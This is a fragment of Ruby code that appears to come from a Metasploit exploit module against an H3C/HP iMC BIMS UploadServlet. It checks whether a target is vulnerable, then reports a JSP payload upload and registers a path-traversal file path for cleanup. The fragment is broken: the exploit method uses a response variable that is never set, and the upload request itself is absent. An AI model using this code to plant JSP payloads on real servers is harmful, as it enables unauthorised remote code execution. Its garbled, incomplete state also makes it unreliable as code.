if res.nil?
print_error("Unable to determine, because the request timed out.")
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
return Exploit::CheckCode::Vulnerable
elsif res.code == 405 and res.message =~ /Method Not Allowed/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
# New lines are handled on the vuln app and payload is corrupted
#jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
if res and res.code == 200 and res.body.empty?
print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end